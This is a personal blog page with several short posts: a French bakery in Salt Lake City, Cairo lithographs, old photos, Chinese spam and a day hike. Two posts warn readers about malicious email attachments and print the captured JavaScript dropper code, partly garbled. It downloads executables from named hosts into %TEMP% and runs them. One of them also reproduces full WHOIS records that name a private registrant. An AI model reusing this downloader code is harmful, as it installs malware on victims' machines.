“He takes them to a pastry shop to eat some good cakes.”

Posted on by The Old Wolf

For as long as I can remember – my very earliest reading days in the 50s – Babar was one of my favorite children’s books. I always loved this page, where Babar takes his two little cousins Arthur and Celeste to a patisserie… those pastries always looked so good to me, and my mother had already introduced me to the delights of brioches.

Yesterday was my wife’s birthday, and we spent the day doing a massive Yarn Hop around the local yarn stores of Salt Lake, but before heading home, we stopped in at “Gourmandise,” a French bakery/café that sits at 250 South 300 East, right where the original Ratskeller Pizza Shoppe used to be.

gourmandise

Photo from their website

That display of pastries and other goodies is Babar come to life for me, and the quality is every bit what I would expect. (No, they’e not paying me for this post.)

Here are two of the goodies we brought home last night, the other two were devoured before I thought of writing this, and they were absolutely divine.

Pastries

Yes, they’re pricey – but you don’t find stuff like this for a buck and a quarter at Smith’s. It’s probably a very good thing that I’m not wealthy enough or close enough to patronize these guys on a regular basis, or I’d look like Fat Albert.

The Old Wolf has *belch*  spoken.

Six Views of Cairo – Robert Hay

Posted on by The Old Wolf

The six lithographs below were published by the American University in Cairo Press in 1983. They were found among my mother’s possessions; she spent years in Egypt on various assignments from World War II to the 1970s.

Description

A - Sabil Kuttab

Description A

B - Bab Zuwayla

Description B

C - Bayn Al Qasrayn

Description C

D - Minaret, Ibn Tulun

Description D

E - A Circumcision Procession

Description E

F - Barquq Mosque

Description F

What would be really interesting would be some contemporary street scenes from Cairo showing what these locales look like today.

The Old Wolf has spoken.

Order to Appear in Court

Posted on by The Old Wolf

Nothing to see here, folks, just move along. Another scam email from fraudsters trying to get me to download malware to my computer.

This time the Javascript code wants to go out to startick.com, mrflapper.com, and ihaveavoice2.com (all of which are invalid top-level domains), and then download and install other nasty stuff to my computer.

Here’s the email that this came attached to:

To: [edited]
Subject: Notice of appearance in Court #00928994

From: “District Court” <jimmie.cowan@138-172.static.hkit4u.com>
Notice to Appear,
You have to appear in the Court on the July 27.
Please, prepare all the documents relating to the case and bring them to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.
You can review complete details of the Court Notice in the attachment.
Sincerely,
Jimmie Cowan,
Clerk of Court.
Attached: Notice_to_Appear_00928994.zip
That “notice to appear” attachment is actually a JavaScript file, and it came as garbage that looked like this:

function sah126() { return ’00) {‘; };  function sah125() { return ‘ == 2’; };  function sah210() { return ‘+fr+’; }; function sah86() { return ‘ar dn’; };  function sah105() { return ‘rea’; };  function sah95() { return ‘bj’; };

But as soon as the code runs, it concatenates all those little bits into something that looks like this:

var stroke=”55565C5E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;

function gvi() { return ‘e’; }

function sah() { return ‘val’; }

function dl(fr)l”); v { var b = “w’; };

ww.startick.com mrflapper.com ihaveavoice2.com”.split’; };

(” “); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject(“WScript.Shelar fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+String.fromCharCode(92)+Math.round(Math.random()*100000000)+”.exe”; var dn = 0; var xo = new ActiveXObject(“MSXML2.XMLHTTP”); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject(“ADODB.Stream”); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; };’; };

try { xo.open(“GET”,”http://”+b%5Bi%5D+”/document.php?rnd=”+fr+”&id=”+stroke, false); xo.send(); } catch (er) {}; if (dn == 1) break; }; }; dl(4851); dl(5382); dl(2753);var po = ”

for (var ckz=1; ckz<=242; ckz++) { po += this[‘sah’+ckz](); } this[gvi()+sah()](po);

I’ve mentioned these a few times before – the only way to keep yourself safe is to never open attachments you receive in email messages unless you are 100% sure whom they are from and what they are.

The bad actors want access to your data and your computer, and they don’t care how they get it.

Be careful out there.

The Old Wolf has spoken.

1911 – Hot town, summer in the city

Posted on by The Old Wolf

maxresdefault

Heat wave in New York. July 6, 1911. “Licking blocks of ice on a hot day.” 5×7 glass negative, George Grantham Bain Collection.

Found at Shorpy.

New York can get blistering hot when a heat wave rolls through. I experienced a number of days like this when I was growing up there. And I’m old enough to remember the ice man with his truck, and an electric crusher on the back so he could deliver chips as well as the blocks.

Our neighborhood didn’t get ice deliveries, those were mostly down in the village if I remember correctly. But I do recall that close to my home was a playground with one of these:

sprinklerball

It was a great way to cool off on a hot summer day. I’m glad there are still water attractions around to help kids stay cool in the summer heat.

The Old Wolf has spoken.

Spam from China

Posted on by The Old Wolf

Chinese Spam

Why would anyone in their right mind respond to a mail blast like this, especially when it’s in Chinese?

尊敬的客户: 您好! 祝您业务更上一层楼。 我司十多年专为中小企业提供香港公司注册服务。在2014年在香港成立的公司有167279间,在2013年在香港成立的公司有174030间,在经济环境越不好的情况下,老板们更热衷研究并注册离岸公司。在香港成立公司是很简单的事情,两个星期多便可以注册完成,注册资本不需要验资,不需要到位,阁下也不需要到香港。在这些年,我们一直在埋头苦干,精心修炼,力争为您提供更专业的离岸注册服务。一直期待着您的联系。      希望! 本邮件是我们合作的开始.

———

English via Google Translate:

Dear Customer: Hello! I wish your business to the next level. Our ten years designed to provide SMEs in Hong Kong Companies Registry services. The company was established in 2014 in Hong Kong, there are 167,279 in the company in 2013 in Hong Kong has 174,030, in the worse economic environment, the owners are more keen to study and register offshore companies. Set up a company in Hong Kong is a very simple matter, more will be able to register two weeks to complete, registered capital does not require verification, no place, you do not need to go to Hong Kong. During these years, we have been working hard, careful cultivation, strive to provide you with more professional offshore registration services. We have been looking forward to your contact.I hope! This message is the beginning of our cooperation.

Unless they’re targeting people in the mainland, this seems like a phenomenally inefficient way of doing business. On the other hand, it could just be a phishing scam looking for the dumbest of the dumb.

The amount of business that is being done in the world based on dishonesty and deception makes my head hurt.

The Old Wolf has spoken.

The ‘10,000 Calorie Sundae’

Posted on by The Old Wolf

gZsSS5e

The image above shows two young girls purchasing a so-called “10,000-calorie sundae” from Blair Parson’s store in Lynchburg, Virginia, sometime in the 1950s. Price: 35¢.

Odds are that this was some marketing license; the average hot fudge sundae comes in at about 284 calories, and these don’t look like killers. But it’s a cute picture.

Another package of Javascript malware

Posted on by The Old Wolf

mon

I wish I were a javascript programmer.

Here’s the code that came to me via email in a .zip file, under the malicious guise of a FedEx delivery label (it was packaged to look like the code you see in my previous post.)

var stroke=”5556515E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;

function cwm() { return ‘e’; };

function xn() { return ‘val’; };

function dl(fr) { var b = “dickinsonwrestlingclub.com etqy.com soflectplit(” “); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject(“WScript.Shell”); var fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+String.fromCharCode(92)+Math.round(Math.random()*100000000)+”.exe”; var dn = 0; var xo = new ActiveXObject(“MSXML2.XMLHTTP”); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject(“ADODB.Stream”); xa.open(); xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; }; try { xo.open(“GET”,”http://”+b%5Bi%5D+”/document.php?rnd=”+fr+”&id=”+stroke, false); xo.send(); } catch (er)) { return ‘.c {}; if (dn == 1) break; } }; dl(7) { return ‘om”.s971); dl(6202’; };  var xv = ”; ); dl(613);

for (var rlh=1; rlh<=225; rlh++) { xv += this[‘xn’+rlh](); } this[cwm()+xn()](xv);

The email:

To: info@academyofgreatness.com
Subject: Problems with item delivery, n.00000732560

From: “FedEx International MailService” <seth.mcdowell@77.241.83.157.static.hosted.by.combell.com>

Dear Customer,

We could not deliver your item.
Please, download Delivery Label attached to this email.
Yours faithfully,
Seth Mcdowell,
Operation Manager.
FedEx_ID_00000732560.zip
 I have said before and will say cheerfully again, Don’t Open Attachments from People You Don’t Know. Just don’t. Files labelled .zip, .exe, .js, or even .doc, .pdf, and others can be malicious. Sadly, too many people suppress the display of file extensions on their machine, because that’s the default Microsoft has herded people into, and it’s dangerous.
The script above goes out to two websites, “dickinsonwrestlingclub.com” which redirects to a Facebook page, and etqy.com. The registration of the first hides behind a privacy wall:
Domain Name: DICKINSONWRESTLINGCLUB.COM
Registry Domain ID: 336832356_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.networksolutions.com
Registrar URL: http://networksolutions.com
Updated Date: 2015-01-29T00:13:33Z
Creation Date: 2006-02-06T15:11:04Z
Registrar Registration Expiration Date: 2017-02-06T05:00:00Z
Registrar: NETWORK SOLUTIONS, LLC.
Registrar IANA ID: 2
Registrar Abuse Contact Email: abuse@web.com
Registrar Abuse Contact Phone: +1.8003337680
Reseller:
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: PERFECT PRIVACY, LLC
Registrant Organization:
Registrant Street: 12808 Gran Bay Parkway West
Registrant City: Jacksonville
Registrant State/Province: FL
Registrant Postal Code: 32258
Registrant Country: US
Registrant Phone: +1.5707088780
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: h72bn4775k5@networksolutionsprivateregistration.com
Registry Admin ID:
Admin Name: PERFECT PRIVACY, LLC
Admin Organization:
Admin Street: 12808 Gran Bay Parkway West
Admin City: Jacksonville
Admin State/Province: FL
Admin Postal Code: 32258
Admin Country: US
Admin Phone: +1.5707088780
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: h72bn4775k5@networksolutionsprivateregistration.com
Registry Tech ID:
Tech Name: PERFECT PRIVACY, LLC
Tech Organization:
Tech Street: 12808 Gran Bay Parkway West
Tech City: Jacksonville
Tech State/Province: FL
Tech Postal Code: 32258
Tech Country: US
Tech Phone: +1.5707088780
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: h72bn4775k5@networksolutionsprivateregistration.com
Name Server: NS1.CTCTEL.COM
Name Server: NS2.CTCTEL.COM
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
The second is registered to someone in Turkey:
Domain Name: etqy.com
Registry Domain ID: 1527531270_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.srsplus.com
Registrar URL: http://srsplus.com
Updated Date: 2014-03-13T20:56:39Z
Creation Date: 2008-11-07T19:15:39Z
Registrar Registration Expiration Date: 2015-11-07T19:15:39Z
Registrar: TLDS LLC. d/b/a SRSPlus
Registrar IANA ID: 320
Registrar Abuse Contact Email: abuse@web.com
Registrar Abuse Contact Phone: +1.8773812449
Reseller:
Domain Status: clientTransferProhibited http://icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Ferhat Yilmaz
Registrant Organization:
Registrant Street: Hasanpasa Mah. Fahrettin Kerim Gokay Cad. No:26 Kadikoy
Registrant City: Istanbul
Registrant State/Province: none
Registrant Postal Code: 34724
Registrant Country: TR
Registrant Phone: +90.90211
Registrant Phone Ext.:
Registrant Fax:
Registrant Fax Ext.:
Registrant Email: info@etqy.com
Registry Admin ID:
Admin Name: Ferhat Yilmaz
Admin Organization:
Admin Street: Hasanpasa Mah. Fahrettin Kerim Gokay Cad. No:26 Kadikoy
Admin City: Istanbul
Admin State/Province: none
Admin Postal Code: 34724
Admin Country: TR
Admin Phone: +90.90211
Admin Phone Ext.:
Admin Fax:
Admin Fax Ext.:
Admin Email: info@etqy.com
Registry Tech ID:
Tech Name: Ferhat Yilmaz
Tech Organization:
Tech Street: Hasanpasa Mah. Fahrettin Kerim Gokay Cad. No:26 Kadikoy
Tech City: Istanbul
Tech State/Province: none
Tech Postal Code: 34724
Tech Country: TR
Tech Phone: +90.90211
Tech Phone Ext.:
Tech Fax:
Tech Fax Ext.:
Tech Email: info@etqy.com
Name Server: ns51.1and1.com
Name Server: ns52.1and1.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/

The code goes out to these websites and downloads other files, and then runs them. What will happen to your computer next is anyone’s guess. That’s why I wish I knew javascript better, so I could determine exactly what was being downloaded and what it is supposed to do.

Whatever the case, stay away from attachments in your email.

The Old Wolf has spoken.

Today’s Hike: Training for Dry Mountain

Posted on by The Old Wolf

Dry Mountain

It’s been a while since I’ve been walking seriously – life just sort of got in the way – but on June 1 I started getting out in the mornings again and today I thought I’d head back up the hillside. The last time I got up so far was a few years back when I hiked up to Mollie’s Nipple, at 6237 feet; today I found the trail that leads up to the top of the Dry Mountain Ridge.

I made it to 6589 today, which is an improvement over last time – and I’m carrying a significant bit more extra weight than I was then, so I feel good about making it that far. It took me 3:44 to get up and back, for a total of 6 miles, with a 1729′ elevation gain. Suffice it to say I was dog tired when I got back down. I think I’ll wait until I’ve shed another 10 pounds or so before I give it another shot.

As you can see from the Google Earth shot above, I’ve got a long way to go even when I make the ridge; Dry Mountain tops 2.4 miles to the south of the ridge above where I was hiking, at an elevation of 9839 feet, so it’s going to be an all-day affair by the time I get up there and back. I’ll need more than one bottle of water for sure. I should have taken two today.

I would seriously not mind cheating if I could find a different access point from the other side. Time will tell.

Here are some photos I took along the way:

20150703_081358

In the middle of the trail, struggling to survive, life finds a way. (Key for scale). Any 4-wheelers come barreling up the road, I’m afraid this little guy is toast. But so pretty and so fragile.

20150703_084822

A view west over Santaquin, Utah.

20150703_091404

A wildfire burned for two weeks on Dry Mountain in late August 2001. The “Mollie” fire consumed the vegetation on more than 8,000 acres. This is how low the fire came at this point on the mountain.

20150703_091844

Looking up from the point where I ran out of steam. To quote a line from Gattaca, “I didn’t save anything for the way back.” I wish I could have made it to the top of that central ridge, but there was just nothing left.

20150703_091951

A panorama taken from where I stopped.

Pigs

Cleaned up after some inconsiderate pigs on the way down. Pick up your trash, Gatlan. At least I left the mountainside cleaner than I found it. like a good Scout should do. I only ever made it to 2nd Class, but the lessons remain.

All in all, it was a good morning. Still recuperating at 3:42 PM, but feeling a bit more human.

The Old Wolf has spoken.